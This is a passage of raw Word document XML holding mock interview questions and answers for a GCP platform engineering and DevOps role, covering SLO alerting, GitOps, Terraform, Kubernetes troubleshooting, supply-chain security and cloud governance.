          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-window multi-burn-rate alerting pages on a combination of a short window (catches fast, severe budget consumption quickly) and a longer window (confirms the burn is sustained, not a brief blip) evaluated together, which reduces both false positives from transient spikes and false negatives from slow-but-real degradation. Tune fast-burn alerts to page immediately at a high burn rate over a short window (e.g. consuming a day's budget in an hour), and slow-burn alerts to create a lower-urgency ticket for sustained moderate consumption over a longer window (e.g. a few days), since the appropriate urgency differs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Cloud Composer/Dataflow: A scheduled data pipeline misses its SLA and downstream dashboards are stale. How would you debug Composer, Dataflow, BigQuery, retries, backfills, and alerting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the Composer/Airflow DAG run history first to see exactly where the pipeline stalled or failed, then check the underlying Dataflow job's worker autoscaling and any stuck/slow stages if the DAG delegated to Dataflow. Verify whether a transient upstream failure triggered retries that pushed the run past the SLA window, check if a backfill is needed to catch downstream tables up, and once resolved, add alerting on the DAG's SLA directly (Airflow supports SLA misses as a first-class alert) rather than only discovering staleness from downstream dashboard complaints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 4 - CI/CD and GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. ArgoCD drift: A team says ArgoCD shows drift between Git and the cluster. How would you investigate and safely reconcile it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the ArgoCD diff view to see exactly what's different between the Git-declared state and the live cluster state, and determine whether the drift came from a manual kubectl change, a mutating webhook/controller modifying the resource after ArgoCD applied it, or a genuine intended change that wasn't committed to Git yet. If it's an unauthorized manual change, sync to reconcile back to Git state; if it's a legitimate change, commit it to Git first so Git remains the source of truth, rather than just clicking sync and losing the change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform monorepo vs multi-repo: How would you decide repository structure for Terraform modules, environments, and app teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a monorepo for shared modules where you want atomic changes and easy discoverability across the platform team, but keep environment/team-specific configurations in separate repos or clearly separated directories with independent state, so one team's apply can't accidentally affect another's infrastructure. The key factor is blast radius and ownership boundaries - structure repos so a given team's changes are isolated to what they actually own, regardless of whether that's technically one repo or many.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Secrets rotation: How would you rotate secrets or keys for production services without downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a rotation pattern that supports both old and new credentials being valid simultaneously for a transition window - create the new secret version, deploy it to consumers, verify they've picked it up (check logs/metrics for successful auth with the new version), then revoke the old version only after confirming the cutover succeeded. Never revoke the old secret before verifying the new one works, and automate this pattern (Secret Manager versioning plus a rollout/verify/revoke pipeline) so rotation is routine rather than a risky manual event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Prometheus scale: Prometheus is overloaded with high cardinality metrics. How would you debug and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Identify the highest-cardinality metrics using `topk` queries against Prometheus's own `prometheus_tsdb_*` metrics or a cardinality analysis tool, and look for label values that shouldn't be labels at all (like user IDs or full URLs, which explode series count). Fix it by removing or aggregating high-cardinality labels at the source, using recording rules to pre-aggregate frequently-queried expensive metrics, and considering a remote-write/Thanos/Cortex setup to shard load if a single Prometheus instance genuinely can't handle the required scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Capacity planning: How would you design capacity planning for GKE node pools supporting both web services and batch or ML workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate node pools by workload type - web services on pools tuned for steady, predictable request-driven scaling, and batch/ML on pools that can use spot/preemptible instances and scale aggressively down to zero when idle, since their utilization patterns and cost sensitivity differ significantly. Forecast capacity from historical peak usage plus growth trends per pool independently, and ensure batch/ML workloads can't starve web services of node capacity by using separate quotas or priority classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Pipeline orchestration: Compare Airflow, Dagster, Kubeflow, and Vertex AI Pipelines for ML/platform use cases. How would you choose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Airflow is the general-purpose, widely-adopted choice for orchestrating any scheduled workflow (not ML-specific) with a huge ecosystem of integrations; Dagster offers a more modern, asset-based approach with better local development and testing ergonomics. Kubeflow Pipelines is Kubernetes-native and well-suited when your ML infrastructure is already Kubernetes-centric; Vertex AI Pipelines is the fully-managed GCP option with tight integration into Vertex AI's model registry and monitoring, trading some flexibility for lower operational overhead - choose based on how much of your stack is already GCP-managed versus needing portability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud Build: How would you design Cloud Build pipelines for Docker builds, vulnerability scanning, provenance, tests, and deployment promotion?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure the pipeline as sequential steps: run tests first (fail fast before spending time on a build), build the Docker image with BuildKit for caching efficiency, scan it for vulnerabilities and block on critical findings, generate build provenance/attestation and sign the image, then push to Artifact Registry. Use separate Cloud Build triggers per environment so promotion to staging/production is an explicit, reviewable step (updating a deployment manifest reference) rather than the same pipeline auto-deploying everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Organization policy: Which GCP org policies would you enforce for a secure baseline, and how would you handle exceptions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce policies like disabling service account key creation (favor Workload Identity), restricting public IP assignment on VMs, requiring OS Login, restricting resource locations for compliance, and enabling Public Access Prevention on storage by default. Handle exceptions through a lightweight, documented request process with an expiry/review date rather than a permanent blanket override, so exceptions stay visible and don't quietly become the new normal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 5 - Cloud Security and DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Supply chain security: How would you implement image scanning, provenance, Binary Authorization, SBOMs, and deployment policies for containers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scan every image for vulnerabilities at build time and continuously in the registry, generate an SBOM (software bill of materials) as part of the build so you know exactly what's in each image, and produce signed build provenance attesting to the source commit and build system. Configure Binary Authorization to reject any image at deploy time that isn't signed by your trusted CI pipeline with valid attestations, closing the gap where someone could otherwise push and run an unverified image directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Container startup: A container works locally but fails in Kubernetes. How would you debug entrypoint, env vars, filesystem, permissions, and security context?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check `kubectl describe pod` and `kubectl logs` first for the exact failure reason, then verify all environment variables/ConfigMaps/Secrets referenced in the pod spec are actually present (a common gap versus local `docker run` where you might pass a local .env file). Check whether the pod's securityContext (runAsNonRoot, read-only root filesystem) is causing a permission failure the local run didn't have, and confirm the entrypoint command doesn't assume an interactive TTY or a working directory that doesn't exist in the Kubernetes-provided filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Terraform Enterprise: Explain how you would implement Terraform Enterprise workspaces, remote state, policy as code, approvals, and module versioning for a large GCP platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure workspaces per environment/team with clear naming conventions, use Terraform Enterprise's built-in remote state management with access controls per workspace, and enforce Sentinel policies (or OPA) that validate plans against organizational guardrails before allowing apply. Require approval workflows on production workspaces so a plan must be reviewed before apply executes, and publish shared modules to the private registry with semantic versioning so teams consume tested, versioned infrastructure code rather than copy-pasting Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Hybrid connectivity: A service is slow over VPN or Interconnect. How would you troubleshoot latency, MTU, routes, BGP, firewall rules, and DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure baseline latency and packet loss over the connection first to establish whether it's a genuine network problem or an application-level issue, then check for MTU-related fragmentation (large packets failing while small ones succeed is a classic sign) and verify BGP routes are advertising and being learned correctly if using dynamic routing. Confirm firewall rules aren't introducing extra hops or being hit inefficiently, and check DNS resolution time separately from data-plane latency, since a slow DNS lookup can masquerade as general connection slowness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Backstage and IDP: How would you design a Backstage-style golden path for creating a new service on GCP with CI/CD, Terraform, monitoring, and security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a software template that scaffolds a new service repository with a working CI/CD pipeline, pre-configured Terraform module calls for the standard infrastructure (GKE deployment, monitoring dashboards, IAM), and baseline security controls already wired in, so a developer running the template gets a production-ready starting point in minutes. Register the resulting service automatically in the catalog with ownership metadata, and keep the template itself versioned so it can improve over time without breaking services already scaffolded from an earlier version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Observability platform: How would you design observability for a platform team so developers get useful golden signals without creating noisy alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provide a standard, auto-instrumented golden-signals dashboard (latency, traffic, errors, saturation) for every service by default via the golden path template, so developers get useful observability without manually setting it up. Keep alerting centered on SLO burn rate and clear user-impact thresholds rather than raw infrastructure metrics, and give teams self-service ability to add custom alerts for their own signals without needing the platform team to gatekeep every alerting rule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud Armor: Design a Cloud Armor and load balancing strategy for an internet-facing service. How would you handle WAF rules, rate limits, exceptions, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Front the service with a global external HTTPS load balancer and Cloud Armor configured with the managed WAF rule set (OWASP-style protections) plus rate limiting to blunt volumetric abuse, starting new rules in preview/dry-run mode to catch false positives before enforcing. Handle exceptions narrowly and with documented justification and review dates, and monitor Cloud Armor logs and metrics (blocked request counts, rule hit rates) so you can tune rules based on real traffic patterns rather than guessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Autoscaling tradeoffs: Explain HPA, VPA, and cluster autoscaler. When can they conflict, and how would you tune them for a production workload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HPA scales the number of pod replicas based on metrics (CPU, custom metrics), VPA adjusts individual pod resource requests/limits, and cluster autoscaler adds/removes nodes based on unschedulable pods or underutilized nodes - they operate at different layers but can conflict if HPA and VPA are both actively resizing/rescaling the same workload simultaneously, causing thrashing. Generally use HPA for stateless services that scale well horizontally, avoid running HPA and VPA on CPU/memory simultaneously for the same workload (use VPA in recommendation-only mode instead), and ensure cluster autoscaler's node pool limits are generous enough not to bottleneck HPA's scaling decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 6 - Observability and Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Firewall governance: How would you design firewall rule ownership, logging, review, and cleanup across many GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require every firewall rule to be created via Terraform (not console) with a mandatory owner tag/description and enable firewall rule logging so usage is visible, not assumed. Run periodic reviews (quarterly) using logging data to identify unused rules and flag overly broad rules (0.0.0.0/0 source) for justification, and centralize rule management for shared/Shared VPC networks so ownership and review responsibility is clear rather than scattered across every team with console access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. ML feature store: What reliability and governance concerns would you consider for an ML feature store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Reliability concerns include feature freshness (is the feature actually up to date when served), training/serving parity (identical computation logic for both paths), and availability of the online serving path under load, since a feature store outage can silently degrade every model that depends on it. Governance concerns include feature ownership and documentation (so teams don't duplicate or misuse features), access control for sensitive underlying data, and versioning so a feature definition change doesn't silently break models trained against the old definition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. CrashLoopBackOff: A pod is stuck in CrashLoopBackOff in production. Give me your exact Kubernetes troubleshooting workflow and the commands or signals you would check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with `kubectl describe pod` to see recent events and the last termination reason/exit code, then `kubectl logs &lt;pod&gt; --previous` to see the crashed container's actual output before it died. Check the exit code specifically (137 usually means OOMKilled, 1 or other application-specific codes point to an app-level crash), verify resource limits aren't too low if OOMKilled, check readiness/liveness probe configuration if the crash is probe-induced, and confirm any mounted ConfigMap/Secret dependencies are correctly present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Migration: How would you migrate an on-prem application to GCP with minimal downtime? Cover networking, data, CI/CD, observability, security, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set up hybrid connectivity (VPN or Interconnect) first so on-prem and GCP can communicate during migration, replicate data continuously (database replication, not a one-time dump) so the GCP side stays current, and build CI/CD, observability, and security controls in GCP before cutover so the new environment is production-ready on day one, not retrofitted after. Cut over with a brief maintenance window or a gradual traffic shift via DNS/load balancer weighting, and keep the on-prem environment running as a rollback option until the GCP environment has proven stable under real traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Cloud Storage lifecycle: How would you design lifecycle, retention, versioning, object holds, CMEK, and audit logging for compliance-sensitive storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Configure lifecycle rules to automatically transition objects to cheaper storage classes or delete them based on age, matched to your actual retention requirements, and use bucket retention policies with object lock for data that must not be deletable before a compliance-mandated period even by an administrator. Enable object versioning where accidental overwrite/deletion recovery matters, use CMEK for encryption key control over sensitive data, and enable data access audit logging so every read of compliance-sensitive objects is recorded for audit purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. OpenTofu: If a company asks about Terraform versus OpenTofu, how would you explain the tradeoffs for enterprise platform teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform (HashiCorp) offers the most mature enterprise ecosystem, official provider support, and Terraform Enterprise/Cloud's managed features, but comes with licensing changes that affect commercial redistribution and some vendor lock-in concerns. OpenTofu is a genuinely open-source fork maintained by the Linux Foundation with growing community momentum and full compatibility with existing Terraform configurations, appealing to teams concerned about licensing terms or wanting more community influence over the roadmap - the practical tradeoff for most teams is ecosystem maturity and vendor support versus licensing freedom and community governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
